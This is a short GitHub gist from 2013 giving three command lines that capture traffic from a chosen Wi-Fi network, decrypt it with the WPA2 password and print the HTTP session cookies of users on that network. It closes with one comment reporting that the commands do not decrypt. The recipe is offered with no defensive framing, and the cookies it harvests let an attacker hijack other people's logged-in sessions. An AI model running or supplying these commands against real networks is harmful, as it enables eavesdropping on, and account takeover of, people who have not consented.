Created
July 12, 2013 01:58
-
-
Save eldondev/5980868 to your computer and use it in GitHub Desktop.
How to decrypt wpa2 packets and use tshark to display cookies. You need to replace wlan1 with whichever wireless adapter you want to use, the bssid, the channel, and the wpa password.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
airmon-ng start wlan1 | |
airodump-ng mon0 --bssid 00:16:B6:DA:XX:XX --channel 6 | |
tshark -i mon0 -o wlan.enable_decryption:TRUE -o wlan.wep_key1:wpa-pwd:<the_wpa_password> -R "http.cookie" -T fields -e http.cookie |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Above command not decrypting. Is it working for you?